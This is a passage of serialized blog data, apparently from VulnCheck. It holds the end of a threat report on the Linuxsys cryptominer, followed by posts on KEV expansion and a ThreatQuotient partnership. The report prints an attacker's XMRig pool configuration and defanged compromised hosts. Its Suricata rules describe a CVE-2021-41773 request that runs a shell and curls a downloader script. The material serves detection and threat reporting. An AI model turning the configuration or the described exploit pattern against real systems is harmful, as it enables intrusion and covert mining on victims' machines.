hosts:",[22,39799,39800,39805,39810,39815,39820],{},[25,39801,39802],{},[886,39803,39804],{},"https:\u002F\u002Fprepstarcenter[.]com\u002Fapp\u002F",[25,39806,39807],{},[886,39808,39809],{},"https:\u002F\u002Fwisecode[.]it\u002Fapp\u002F",[25,39811,39812],{},[886,39813,39814],{},"https:\u002F\u002Fdodoma[.]shop\u002Fwp-content\u002Fuploads\u002F2000\u002F01\u002F",[25,39816,39817],{},[886,39818,39819],{},"https:\u002F\u002Fportailimmersion[.]ca\u002Fwp-content\u002Fuploads\u002F",[25,39821,39822],{},[886,39823,39824],{},"https:\u002F\u002Ftest.anepf[.]org\u002Fcss\u002F",[18,39826,39827,39828,39831,39832,982,39835,39838],{},"Also hosted on these victims is ",[886,39829,39830],{},"cron.sh",", which ensures the coinminer restarts on reboot, and two Windows executables (",[886,39833,39834],{},"nssm.exe",[886,39836,39837],{},"winsys.exe","). That suggests there is a Windows component to this operation, but we did not observe it in action.",[18,39840,39841,39842,39844],{},"All of these appear to be legitimate sites, suggesting the attacker is compromising third-party systems to distribute the miner and configuration files. This approach is clever because victims connect to legitimate hosts with valid SSL certificates, making detection less likely. Additionally, it provides a layer of separation for the downloader site (",[886,39843,39637],{},") since the malware itself isn’t hosted there.",[18,39846,39847,39848,39850,39851,39854],{},"Grabbing the config file from one of the victims, we find standard XMRig data. 
The current config iteration",[1373,39849,34293],{}," points to ",[886,39852,39853],{},"hashvault.pro"," as the mining pool.",[1354,39856,39858],{"className":22307,"code":39857,"language":22309,"meta":219,"style":219},"  \"pools\": [\n {\n   \"algo\": null,\n   \"coin\": null,\n   \"url\": \"pool.hashvault.pro:443\",\n   \"user\": \"49VQVgmN9vYccj2tEgD7qgJPbLiGQcQ4uJxTRkTJUCZXRruR7HFD7keebLdYj6Bf5xZKhFKFANFxZhj3BCmRT9pe4NG325b+72000\",\n   \"pass\": \"lucifer\",\n   \"rig-id\": null,\n   \"nicehash\": false,\n   \"keepalive\": true,\n   \"enabled\": true,\n   \"tls\": true,\n   \"tls-fingerprint\": \"420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14\",\n   \"daemon\": false,\n   \"self-select\": null\n }\n  ],\n",[886,39859,39860,39873,39877,39893,39908,39927,39947,39967,39982,39997,40012,40027,40042,40062,40077,40091,40095],{"__ignoreMap":219},[1373,39861,39862,39864,39867,39869,39871],{"class":1375,"line":1376},[1373,39863,23732],{"class":1387},[1373,39865,39866],{"class":1391},"pools",[1373,39868,183],{"class":1387},[1373,39870,20051],{"class":4640},[1373,39872,9050],{"class":1383},[1373,39874,39875],{"class":1375,"line":220},[1373,39876,4765],{"class":1383},[1373,39878,39879,39882,39885,39887,39889,39891],{"class":1375,"line":1266},[1373,39880,39881],{"class":9152},"   
\"",[1373,39883,39884],{"class":9155},"algo",[1373,39886,183],{"class":9152},[1373,39888,4606],{"class":1383},[1373,39890,15680],{"class":7054},[1373,39892,9062],{"class":1383},[1373,39894,39895,39897,39900,39902,39904,39906],{"class":1375,"line":1852},[1373,39896,39881],{"class":9152},[1373,39898,39899],{"class":9155},"coin",[1373,39901,183],{"class":9152},[1373,39903,4606],{"class":1383},[1373,39905,15680],{"class":7054},[1373,39907,9062],{"class":1383},[1373,39909,39910,39912,39914,39916,39918,39920,39923,39925],{"class":1375,"line":4692},[1373,39911,39881],{"class":9152},[1373,39913,7585],{"class":9155},[1373,39915,183],{"class":9152},[1373,39917,4606],{"class":1383},[1373,39919,4883],{"class":9173},[1373,39921,39922],{"class":9176},"pool.hashvault.pro:443",[1373,39924,183],{"class":9173},[1373,39926,9062],{"class":1383},[1373,39928,39929,39931,39934,39936,39938,39940,39943,39945],{"class":1375,"line":4724},[1373,39930,39881],{"class":9152},[1373,39932,39933],{"class":9155},"user",[1373,39935,183],{"class":9152},[1373,39937,4606],{"class":1383},[1373,39939,4883],{"class":9173},[1373,39941,39942],{"class":9176},"49VQVgmN9vYccj2tEgD7qgJPbLiGQcQ4uJxTRkTJUCZXRruR7HFD7keebLdYj6Bf5xZKhFKFANFxZhj3BCmRT9pe4NG325b+72000",[1373,39944,183],{"class":9173},[1373,39946,9062],{"class":1383},[1373,39948,39949,39951,39954,39956,39958,39960,39963,39965],{"class":1375,"line":4756},[1373,39950,39881],{"class":9152},[1373,39952,39953],{"class":9155},"pass",[1373,39955,183],{"class":9152},[1373,39957,4606],{"class":1383},[1373,39959,4883],{"class":9173},[1373,39961,39962],{"class":9176},"lucifer",[1373,39964,183],{"class":9173},[1373,39966,9062],{"class":1383},[1373,39968,39969,39971,39974,39976,39978,39980],{"class":1375,"line":4768},[1373,39970,39881],{"class":9152},[1373,39972,39973],{"class":9155},"rig-id",[1373,39975,183],{"class":9152},[1373,39977,4606],{"class":1383},[1373,39979,15680],{"class":7054},[1373,39981,9062],{"class":1383},[1373,39983,39984,39986,39989,39991,39993,39
995],{"class":1375,"line":4792},[1373,39985,39881],{"class":9152},[1373,39987,39988],{"class":9155},"nicehash",[1373,39990,183],{"class":9152},[1373,39992,4606],{"class":1383},[1373,39994,16311],{"class":7054},[1373,39996,9062],{"class":1383},[1373,39998,39999,40001,40004,40006,40008,40010],{"class":1375,"line":4798},[1373,40000,39881],{"class":9152},[1373,40002,40003],{"class":9155},"keepalive",[1373,40005,183],{"class":9152},[1373,40007,4606],{"class":1383},[1373,40009,14986],{"class":7054},[1373,40011,9062],{"class":1383},[1373,40013,40014,40016,40019,40021,40023,40025],{"class":1375,"line":4806},[1373,40015,39881],{"class":9152},[1373,40017,40018],{"class":9155},"enabled",[1373,40020,183],{"class":9152},[1373,40022,4606],{"class":1383},[1373,40024,14986],{"class":7054},[1373,40026,9062],{"class":1383},[1373,40028,40029,40031,40034,40036,40038,40040],{"class":1375,"line":4817},[1373,40030,39881],{"class":9152},[1373,40032,40033],{"class":9155},"tls",[1373,40035,183],{"class":9152},[1373,40037,4606],{"class":1383},[1373,40039,14986],{"class":7054},[1373,40041,9062],{"class":1383},[1373,40043,40044,40046,40049,40051,40053,40055,40058,40060],{"class":1375,"line":4825},[1373,40045,39881],{"class":9152},[1373,40047,40048],{"class":9155},"tls-fingerprint",[1373,40050,183],{"class":9152},[1373,40052,4606],{"class":1383},[1373,40054,4883],{"class":9173},[1373,40056,40057],{"class":9176},"420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14",[1373,40059,183],{"class":9173},[1373,40061,9062],{"class":1383},[1373,40063,40064,40066,40069,40071,40073,40075],{"class":1375,"line":4835},[1373,40065,39881],{"class":9152},[1373,40067,40068],{"class":9155},"daemon",[1373,40070,183],{"class":9152},[1373,40072,4606],{"class":1383},[1373,40074,16311],{"class":7054},[1373,40076,9062],{"class":1383},[1373,40078,40079,40081,40084,40086,40088],{"class":1375,"line":4843},[1373,40080,39881],{"class":9152},[1373,40082,40083],{"class":9155},"self-select",[1373,40085,183],{"class":
9152},[1373,40087,4606],{"class":1383},[1373,40089,40090],{"class":7054}," null\n",[1373,40092,40093],{"class":1375,"line":4849},[1373,40094,35334],{"class":1383},[1373,40096,40097,40100],{"class":1375,"line":4877},[1373,40098,40099],{"class":1383},"  ]",[1373,40101,9062],{"class":4640},[18,40103,40104,40105,982,40107,40110],{},"Examining the wallet shows two active workers, named ",[1131,40106,39962],{},[1131,40108,40109],{},"baphomet",", totaling roughly 400 workers (read: victims). The wallet has been receiving payouts since January 2025 but has only accrued about 0.024 XMR per day over that timeframe, roughly $8 per day. This suggests a very small-scale operation that might not be worth noticing. However, there is more to uncover.",[1920,40112,40114],{"id":40113},"history-of-linuxsys","History of Linuxsys",[18,40116,40117,40118,40121,40122,40125,40127,40128,982,40130,40132,40133,982,40136,40139,40140,40143],{},"The first mention of Linuxsys in the security realm appears in Hal Pomeranz’s blog, which discusses payloads for ",[47,40119,1514],{"href":39595,"rel":40120},[51],". The blog, titled ",[1131,40123,40124],{},"Hudak’s Honeypot (Part 4)",[1373,40126,34329],{},", was published in December 2021. Linuxsys makes an appearance towards the end of the blog, where Hal presents snippets from ",[886,40129,39830],{},[886,40131,39645],{},". We can even see that the attacker was hosting ",[886,40134,40135],{},"config.json",[886,40137,40138],{},"linuxsys"," on a legitimate WordPress site (",[886,40141,40142],{},"http:\u002F\u002Fshumoizolyaciya.12volt[.]ua","). Essentially, the attacker has employed the exact same methodology for the last four years.",[18,40145,40146,40147,40150],{},"Linuxsys isn’t only associated with ",[47,40148,1514],{"href":39595,"rel":40149},[51],". 
Over the past few years, several security companies have mentioned the attacker using different vulnerabilities.",[22,40152,40153,40169,40179,40189,40206],{},[25,40154,40155,40156,40158,40159,982,40164,59],{},"Darktrace",[1373,40157,34352],{}," associates the attacker’s methodology with ",[47,40160,40163],{"href":40161,"rel":40162},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-0012",[51],"CVE-2024-0012",[47,40165,40168],{"href":40166,"rel":40167},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-9474",[51],"CVE-2024-9474",[25,40170,10492,40171,40173,40174,59],{},[1373,40172,34447],{}," associates the attacker with ",[47,40175,40178],{"href":40176,"rel":40177},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-36401",[51],"CVE-2024-36401",[25,40180,40181,40182,40185,40186,59],{},"TrendMicro",[1373,40183,40184],{},"^7"," associates the attacker with exploitation of ",[47,40187,22217],{"href":22215,"rel":40188},[51],[25,40190,40191,40192,40185,40195,40200,40201,40205],{},"Imunify Security",[1373,40193,40194],{},"^8",[47,40196,40199],{"href":40197,"rel":40198},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-34960",[51],"CVE-2023-34960",". This vulnerability is not listed in CISA KEV but has been in ",[47,40202,1233],{"href":40203,"rel":40204},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-kev?cve=CVE-2023-34960",[51]," since June 2023.",[25,40207,11029,40208,40211,40212,40215,40216,40220],{},[1373,40209,40210],{},"^9"," appears to associate the attacking IP with ",[47,40213,10435],{"href":10433,"rel":40214},[51],". 
This vulnerability, affecting Metabase, is also missing from CISA KEV, but has been in ",[47,40217,1233],{"href":40218,"rel":40219},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-kev?cve=CVE-2023-38646",[51]," since November 2023.",[18,40222,40223,40224,40227,40228,40231,40232,40234,40235,40238,40239,40241],{},"Additionally, there have been Stack Exchange",[1373,40225,40226],{},"^10"," and Reddit",[1373,40229,40230],{},"^11"," posts demonstrating exploitation by the attacker (at least, using the ",[886,40233,40138],{}," name). QianXin",[1373,40236,40237],{},"^12"," documented Returned Libra (aka 8220 Mining Group) looking for ",[886,40240,40138],{}," on hosts in order to kill it off.",[18,40243,40244,40245,40248,40249,40251,40252],{},"If we look up the hash",[1373,40246,40247],{},"^13"," of the ",[886,40250,40138],{}," hosted on the victim sites, we can also see that VirusTotal has ~40 variations of the ",[886,40253,39645],{},[18,40255,40256],{},[68,40257],{":width":10862,"alt":39625,"src":40258},"\u002Fblog\u002Flinuxsys-cryptominer\u002Fvirustotal-parents.png",[18,40260,40261],{},"All of this indicates that the attacker has been conducting a long-term campaign, employing consistent techniques such as n-day exploitation, staging content on compromised hosts, and coin mining on victim machines. This campaign has persisted for an extended period, achieving moderate success.",[18,40263,40264],{},"Part of their success comes from careful targeting. They appear to avoid low interaction honeypots and require high interaction to observe their activity. Combined with the use of compromised hosts for malware distribution, this approach has largely helped the attacker avoid scrutiny. 
We assume that the miner is operating in more pools than the one we observed, as this seems like a considerable amount of work for such a low payout; however, we don’t have conclusive evidence for that.",[1920,40266,39270],{"id":39269},[18,40268,32391,40269,39276],{},[47,40270,1245],{"href":1243,"rel":40271},[51],[307,40273,40274,40283],{},[310,40275,40276],{},[313,40277,40278,40280],{},[316,40279,319],{},[316,40281,40282],{},"VulnCheck SIDS",[336,40284,40285,40292,40299,40306,40313,40320,40327],{},[313,40286,40287,40289],{},[341,40288,1514],{},[341,40290,40291],{},"12700024",[313,40293,40294,40296],{},[341,40295,22217],{},[341,40297,40298],{},"12700246, 12700258, 12700259",[313,40300,40301,40303],{},[341,40302,40199],{},[341,40304,40305],{},"12700176",[313,40307,40308,40310],{},[341,40309,10435],{},[341,40311,40312],{},"12700180",[313,40314,40315,40317],{},[341,40316,40163],{},[341,40318,40319],{},"12700421",[313,40321,40322,40324],{},[341,40323,40168],{},[341,40325,40326],{},"12700422",[313,40328,40329,40331],{},[341,40330,40178],{},[341,40332,40333],{},"12700320",[18,40335,39299],{},[993,40337,39303],{"id":39302},[22,40339,40340],{},[25,40341,40342,40343,40345],{},"103.193.177",[1373,40344,59],{},"152",[993,40347,40349],{"id":40348},"initial-bash-script-linuxsh-distribution","Initial bash script (linux.sh) distribution",[22,40351,40352],{},[25,40353,40354,40355,40357],{},"repositorylinux",[1373,40356,59],{},"org",[993,40359,40361],{"id":40360},"compromised-hosts-distributing-configurations-and-xmrig-variants","Compromised hosts distributing configurations and XMRig 
variants",[22,40363,40364,40368,40372,40376,40380],{},[25,40365,40366],{},[886,40367,39804],{},[25,40369,40370],{},[886,40371,39809],{},[25,40373,40374],{},[886,40375,39814],{},[25,40377,40378],{},[886,40379,39819],{},[25,40381,40382],{},[886,40383,39824],{},[993,40385,39333],{"id":39332},[307,40387,40388,40396],{},[310,40389,40390],{},[313,40391,40392,40394],{},[316,40393,39342],{},[316,40395,39345],{},[336,40397,40398,40405,40413,40420],{},[313,40399,40400,40402],{},[341,40401,40138],{},[341,40403,40404],{},"75612233d32768186d0557dd39abbbd3284a2a29",[313,40406,40407,40410],{},[341,40408,40409],{},"config.sh",[341,40411,40412],{},"52d31b33b3dcd31bc515df70da6925deb93e2473",[313,40414,40415,40417],{},[341,40416,39645],{},[341,40418,40419],{},"7797530e1b7216fa1c7467e06008ac38e02f5a0a",[313,40421,40422,40424],{},[341,40423,39830],{},[341,40425,40426],{},"a7bbd502cc2389f4794cdc95619194c61f4e05fe",[993,40428,40430],{"id":40429},"suricata-rules","Suricata Rules",[1354,40432,40435],{"className":40433,"code":40434,"language":1359},[1357],"alert dns any any -> any 53 ( \\\n msg: \"VULNCHECK DNS Lookup for Known Malicious Linuxsys URL: repositorylinux.org\"; \\\n dns.query; content: \"repositorylinux.org\"; nocase; \\\n classtype:domain-c2; \\\n sid:12800002; rev:1;)\n\nalert http any any -> any any ( \\\n msg:\"VULNCHECK Linuxsys CVE-2021-41773 Exploit Attempt\"; \\\n flow:to_server; \\\n http.method; content:\"POST\"; \\\n http.uri.raw; content:\"\u002Fcgi-bin\u002F.%2e\u002F\"; startswith; \\\n content:\"\u002Fbin\u002Fsh\"; distance: 0; \\\n http.request_body; content:\"curl\"; \\\n content:\"\u002Flinux.sh\"; distance: 0; \\\n content:\"\u002Flinux.sh\"; distance: 0; \\\n classtype:targeted-activity; \\\n reference:cve,CVE-2021-41773; \\\n 
sid:12800003;)\n",[886,40436,40434],{"__ignoreMap":219},[1920,40438,202],{"id":201},[18,40440,39360,40441,1246,40448,1246,40453,1255,40458,59],{},[1131,40442,40443],{},[47,40444,40447],{"href":40445,"rel":40446},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fpapercut-rce",[51],"PaperCut Exploitation",[1131,40449,40450],{},[47,40451,36637],{"href":36635,"rel":40452},[51],[1131,40454,40455],{},[47,40456,35931],{"href":35927,"rel":40457},[51],[1131,40459,40460],{},[47,40461,22211],{"href":22207,"rel":40462},[51],[18,40464,33941,40465,33945,40468,1240,40471,982,40474,1260],{},[47,40466,1233],{"href":10806,"rel":40467},[51],[47,40469,1239],{"href":1237,"rel":40470},[51],[47,40472,1245],{"href":1243,"rel":40473},[51],[47,40475,216],{"href":1258,"rel":40476},[51],[1920,40478,2850],{"id":2849},[2901,40480,40481],{},"",{"title":219,"searchDepth":220,"depth":220,"links":40483},[40484,40485,40486,40487,40488],{"id":39302,"depth":1266,"text":39303},{"id":40348,"depth":1266,"text":40349},{"id":40360,"depth":1266,"text":40361},{"id":39332,"depth":1266,"text":39333},{"id":40429,"depth":1266,"text":40430},"VulnCheck observes exploitation of CVE-2021-41773 in the wild, and attributes the attack to the Linuxsys cryptominer. 
The team additionally discovers that the cryptominer has been part of a long-running campaign exploiting multiple vulnerabilities with a consistent attacker methodology since at least 2021.",{"slug":40491},"linuxsys-cryptominer","\u002Fblog\u002Flinuxsys-cryptominer",{"title":36760,"description":40489},"blog\u002Flinuxsys-cryptominer",[2941,242,1281,23275,1279],"nG_whQ_FbV8B928-k9m4TMXW1falHCBMnW-E9LfZX90",{"id":40498,"title":40499,"articles":7,"authors":40500,"body":40502,"date":40685,"description":40499,"extension":234,"image":7,"link":7,"meta":40686,"navigation":237,"path":40688,"seo":40689,"series":7,"stem":40690,"subtype":7,"tags":40691,"__hash__":40692},"blog\u002Fblog\u002Fkev-expansion-2025.md","Expanding VulnCheck’s KEV: Auditing ShadowServer, New CVE Assignments, and Source Expansion",[40501],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":40503,"toc":40677},[40504,40507,40511,40514,40519,40568,40573,40577,40580,40586,40592,40598,40601,40604,40608,40614,40622,40626,40629,40635,40641,40645,40651,40660,40662,40665],[18,40505,40506],{},"In recent weeks, our KEV (Known Exploited Vulnerabilities) feed has seen a notable increase in CVEs. If you've noticed and are wondering what's driving the spike, you're not alone. The short answer: VulnCheck has been hard at work closing the gap on untracked exploitation by auditing publicly available sources and assigning CVEs where none existed. Here's a look behind the scenes at what’s been happening.",[61,40508,40510],{"id":40509},"why-the-spike-in-cves","Why the Spike in CVEs?",[18,40512,40513],{},"Two major developments contributed to the increase:",[1789,40515,40516],{},[25,40517,40518],{},"Auditing ShadowServer for Unassigned CVEs\nWe performed an extensive audit of ShadowServer's daily detection snapshots. 
During this process, we identified vulnerabilities with active detections but no associated CVE ID, a major blind spot for defenders relying on structured vulnerability intelligence.\nRather than let these gaps persist, we tracked down the original advisories and\u002For exploit proof-of-concepts and issued CVEs ourselves. In total, we contributed 30+ new CVEs through this audit process where exploitation evidence existed.",[18,40520,40521,40522,1246,40527,1246,40531,1246,40536,1246,40541,1246,40546,1246,40549,1246,40553,1246,40558,40563,40564,59],{},"These vulnerabilities span a range of high-risk technologies, including camera systems, network edge devices, and content management systems—frequent targets for botnets and threat actors. Notable vendors affected include ",[47,40523,40526],{"href":40524,"rel":40525},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Fhikvision-ismp-rce-applyct",[51],"Hikvision",[47,40528,24304],{"href":40529,"rel":40530},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Fdlink-dsl-routers-path-traversal-file-read",[51],[47,40532,40535],{"href":40533,"rel":40534},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Favtech-ipcamera-nvr-dvr-mulitple-vulns",[51],"AVTech",[47,40537,40540],{"href":40538,"rel":40539},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Fdahua-smart-cloud-gateway-sql-injection",[51],"Dahua",[47,40542,40545],{"href":40543,"rel":40544},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Flinksys-routers-command-injection",[51],"Linksys",[47,40547,40548],{"href":219},"Moodle",[47,40550,24194],{"href":40551,"rel":40552},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Fshenzhen-tvt-cctv-dvr-command-injection",[51],[47,40554,40557],{"href":40555,"rel":40556},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Fsugarcrm-php-deserialization-rce",[51],"SugarCRM",[47,40559,40562],{"href":40560,"rel":40561},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Fedimax-ew-7438rpn-command-injections",[51],"Edi
max",", among others.\nMany of the issues we identified are older, unpatched flaws in widely deployed technologies, often originating from Chinese manufacturers. Details on each of these CVEs can be found in our advisory archive here: ",[47,40565,40566],{"href":40566,"rel":40567},"https:\u002F\u002Fvulncheck.com\u002Fadvisories",[51],[1789,40569,40570],{},[25,40571,40572],{},"Introduction of CrowdSec as a Source\nWe've added CrowdSec’s public exploitation evidence as a new exploitation reference source within VulnCheck KEV. We continuously seek high-signal, reliable public sources of exploitation evidence, and CrowdSec fits the bill. This resulted in the addition of 70+ vulnerabilities to VulnCheck KEV that we didn’t already have exploitation evidence for.",[61,40574,40576],{"id":40575},"expanding-the-cve-ecosystem","Expanding the CVE Ecosystem",[18,40578,40579],{},"VulnCheck’s role here isn't limited to aggregation. When we find credible exploitation without a CVE, we treat that as a security intelligence failure, and we act.\nOur Process:",[18,40581,40582,40585],{},[295,40583,40584],{},"Daily ShadowServer Snapshot Analysis","\nWe continuously ingest detection telemetry and flag items lacking CVE attribution.",[18,40587,40588,40591],{},[295,40589,40590],{},"Manual Verification","\nFor each flagged issue, we identify relevant advisories or exploits.",[18,40593,40594,40597],{},[295,40595,40596],{},"CVE Assignment","\nWhen warranted, we submit and assign a CVE through the appropriate channels. This also involves coordination with CNAs (CVE numbering authorities) with the most appropriate scope. 
This includes close coordination with Mitre and the new CVE research working group that was recently formed.",[18,40599,40600],{},"This proactive CVE assignment strategy isn't exclusive to ShadowServer; we're also auditing Metasploit and ExploitDB in a similar manner, so the riskiest vulnerabilities that were overlooked receive a CVE.",[18,40602,40603],{},"This highlights our commitment to the success of the CVE Program.",[61,40605,40607],{"id":40606},"meet-the-team-behind-it","Meet the Team Behind It",[18,40609,40610],{},[68,40611],{"alt":40612,"src":40613},"Wade KEVs","\u002Fblog\u002Fkev-expansion-2025\u002Fwade.png",[18,40615,40616,40617,40621],{},"This initiative was spearheaded by our vulnerability intelligence team, including recent hire ",[47,40618,40620],{"href":19765,"rel":40619},[51],"Wade Sparks III",", formerly of the CISA KEV team. Wade has been instrumental in streamlining CVE submissions and bringing field-tested experience to our approach.",[61,40623,40625],{"id":40624},"whats-next","What’s Next?",[18,40627,40628],{},"While the ShadowServer audit is nearing completion, we expect the spike in volume will taper off, our work is far from over. 
Next up:",[18,40630,40631,40634],{},[295,40632,40633],{},"Metasploit & ExploitDB Audits:"," Ongoing efforts to catch more untracked, higher risk vulnerabilities with readily available exploits.",[18,40636,40637,40640],{},[295,40638,40639],{},"More CVE Assignments:"," We’re committed to assigning CVE IDs to vulnerabilities that pose high risk, so they appear in scanners, dashboards, and security tools worldwide.",[61,40642,40644],{"id":40643},"follow-our-work-get-alerted","Follow Our Work & Get Alerted",[18,40646,40647,40648],{},"You can always view the latest advisories at: ",[47,40649,40566],{"href":40566,"rel":40650},[51],[18,40652,40653,40654,40659],{},"Subscribe for free to ",[47,40655,40658],{"href":40656,"rel":40657},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fvulncheck-kev-alerts",[51],"VulnCheck KEV alerts"," and get alerted via Email or Slack each time we add a new KEV.",[61,40661,202],{"id":201},[18,40663,40664],{},"VulnCheck is helping organizations not just to solve the vulnerability prioritization challenge - we’re working to help equip any product manager, security team and threat hunting team to get faster and more accurate intelligence with infinite efficiency using VulnCheck solutions.\nWe knew that defenders needed better data, faster across the board, in our industry. So that’s what we deliver to the market. 
We deliver key insights on vulnerability management, exploitation and major trends we can extrapolate from our dataset to continuously support practitioners.",[18,40666,40667,40668,8659,40673,40676],{},"Join the VulnCheck Community today and get access to our ",[47,40669,40672],{"href":40670,"rel":40671},"https:\u002F\u002Fvulncheck.com\u002Fnvd2",[51],"VulnCheck NVD++",[47,40674,1233],{"href":2871,"rel":40675},[51]," in 30 seconds or less.",{"title":219,"searchDepth":220,"depth":220,"links":40678},[40679,40680,40681,40682,40683,40684],{"id":40509,"depth":220,"text":40510},{"id":40575,"depth":220,"text":40576},{"id":40606,"depth":220,"text":40607},{"id":40624,"depth":220,"text":40625},{"id":40643,"depth":220,"text":40644},{"id":201,"depth":220,"text":202},"2025-07-10",{"slug":40687,"blogtitle":40499},"kev-expansion-2025","\u002Fblog\u002Fkev-expansion-2025",{"title":40499,"description":40499},"blog\u002Fkev-expansion-2025",[1280,242,1279],"HA-v5AECV-UkaFLnMRc4zfRU9t9uXqP3RmmYhM4lOlw",{"id":40694,"title":40695,"articles":40696,"authors":40697,"body":40699,"date":40887,"description":40888,"extension":234,"image":7,"link":7,"meta":40889,"navigation":237,"path":40891,"seo":40892,"series":7,"stem":40893,"subtype":7,"tags":40894,"__hash__":40895},"blog\u002Fblog\u002Fvulncheck-threatquotient-partnership.md","VulnCheck Integrates with ThreatQuotient: Operationalize Exploit Intelligence in the ThreatQ Platform and is Now Generally Available on the ThreatQ Marketplace",[],[40698],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":40700,"toc":40879},[40701,40708,40714,40717,40725,40731,40737,40740,40748,40751,40754,40757,40763,40766,40812,40815,40821,40824,40850,40856,40859,40865,40872],[18,40702,40703],{},[68,40704],{"alt":40705,"src":40706,"style":40707},"VulnCheck & ThreatQuotient 
Partnership","\u002Fblog\u002Fvuln-check-and-threat-quotient-partnership-email-banner.png","width:100%;",[61,40709,40711],{"id":40710},"strategic-partnership-announcement",[295,40712,40713],{},"Strategic Partnership Announcement",[18,40715,40716],{},"VulnCheck is excited to announce its integration with ThreatQuotient’s ThreatQ Platform — now generally available in the ThreatQ Marketplace. This integration brings VulnCheck’s exploit-centric vulnerability intelligence directly into ThreatQ, enabling joint customers to supercharge threat operations, vulnerability prioritization, and incident response with real-world exploit data.",[18,40718,2245,40719,40724],{},[47,40720,40723],{"href":40721,"rel":40722},"https:\u002F\u002Fhubs.la\u002FQ03vyBSv0",[51],"VulnCheck app is available here"," in the ThreatQ Marketplace.",[61,40726,40728],{"id":40727},"the-problem-were-solving-together",[295,40729,40730],{},"The Problem We're Solving Together:",[18,40732,40733,40734],{},"Security teams are constantly forced to triage long lists of vulnerabilities with limited context. CVSS scores and basic enrichment often miss the most critical piece: ",[295,40735,40736],{},"Is this vulnerability actively being exploited — and how?",[18,40738,40739],{},"Combined with the lack of true automation in the market to power timely threat response when new exploited vulnerabilities are validated and confirmed, teams also have to rely on slow and manual processes to triage what they hope are the prioritized vulnerabilities.",[18,40741,40742,40743,59],{},"ThreatQuotient customers can now integrate and rely on VulnCheck’s Community intelligence feeds to support their response workflows. 
VulnCheck KEV, ",[47,40744,40747],{"href":40745,"rel":40746},"https:\u002F\u002Fvulncheck.com\u002Fcommunity",[51],"freely available on VulnCheck’s Community tier",[18,40749,40750],{},"By combining VulnCheck’s deep visibility into exploitation with ThreatQuotient’s powerful threat operations platform, organizations can focus efforts on vulnerabilities that matter most.",[18,40752,40753],{},"What’s cool about this partnership is that ThreatQuotient customers can leverage VulnCheck data easily by simply downloading the app in the Marketplace, and apply it to automated response playbooks.",[18,40755,40756],{},"ThreatQuotient is a leader in the Threat Intelligence Platform (TIP) market, and under Securonix now, we look forward to exposing VulnCheck intelligence a global installed based that carries a significant footprint in the enterprise.",[61,40758,40760],{"id":40759},"what-vulncheck-brings-to-threatq",[295,40761,40762],{},"What VulnCheck Brings to ThreatQ",[18,40764,40765],{},"The VulnCheck integration provides automated ingestion of machine-readable, exploit-enriched vulnerability intelligence directly into the ThreatQ Platform, including:",[22,40767,40768,40793],{},[25,40769,40770,40773],{},[295,40771,40772],{},"Exploit Intelligence:",[22,40774,40775,40778,40781,40784,40787,40790],{},[25,40776,40777],{},"Evidence-based exploitation in-the-wild intelligence",[25,40779,40780],{},"GitHub-hosted PoCs, exploit toolkits, and malware references",[25,40782,40783],{},"Exploit maturity (PoC-only vs. weaponized vs. 
widely exploited)",[25,40785,40786],{},"Exploit type classification (e.g., RCE, privilege escalation)",[25,40788,40789],{},"Indicators tied to known exploitation associated with attacker activity and ransomware families",[25,40791,40792],{},"Campaign tracking for initial access brokers and opportunistic threat actors",[25,40794,40795,40798],{},[295,40796,40797],{},"Vulnerability Intelligence:",[22,40799,40800,40803,40806,40809],{},[25,40801,40802],{},"Enriched CVE metadata beyond NVD and CISA KEV",[25,40804,40805],{},"Real-time timelines of exploit activity and vulnerability lifecycle",[25,40807,40808],{},"Risk context mapped to real-world threat behavior",[25,40810,40811],{},"Added CPE intelligence that is not available on NIST NVD",[18,40813,40814],{},"This integration allows ThreatQ users to automatically normalize and correlate VulnCheck data with their broader threat intel ecosystem, including malware families, adversary TTPs, intrusion sets, and vulnerability disclosures.",[61,40816,40818],{"id":40817},"key-use-cases-for-joint-customers",[295,40819,40820],{},"Key Use Cases for Joint Customers",[18,40822,40823],{},"There are key use cases this integration delivers to enterprise and Federal customers to improve response time, validate known exploited vulnerabilities, investigate vulnerabilities with added context and CPE intelligence and automate rapid responses for the most highly-prioritized vulnerabilities.",[1789,40825,40826,40832,40838,40844],{},[25,40827,40828,40831],{},[295,40829,40830],{},"Vulnerability Prioritization Based on Exploitation, Not Just Scores"," Move beyond CVSS-based triage by identifying the subset of vulnerabilities that are currently being exploited or are highly exploitable.",[25,40833,40834,40837],{},[295,40835,40836],{},"Enrichment of Threat Objects and Events"," Enrich CVEs, observables, and adversary profiles in ThreatQ with VulnCheck’s data — including exploit PoCs, C2 infrastructure, and in-the-wild 
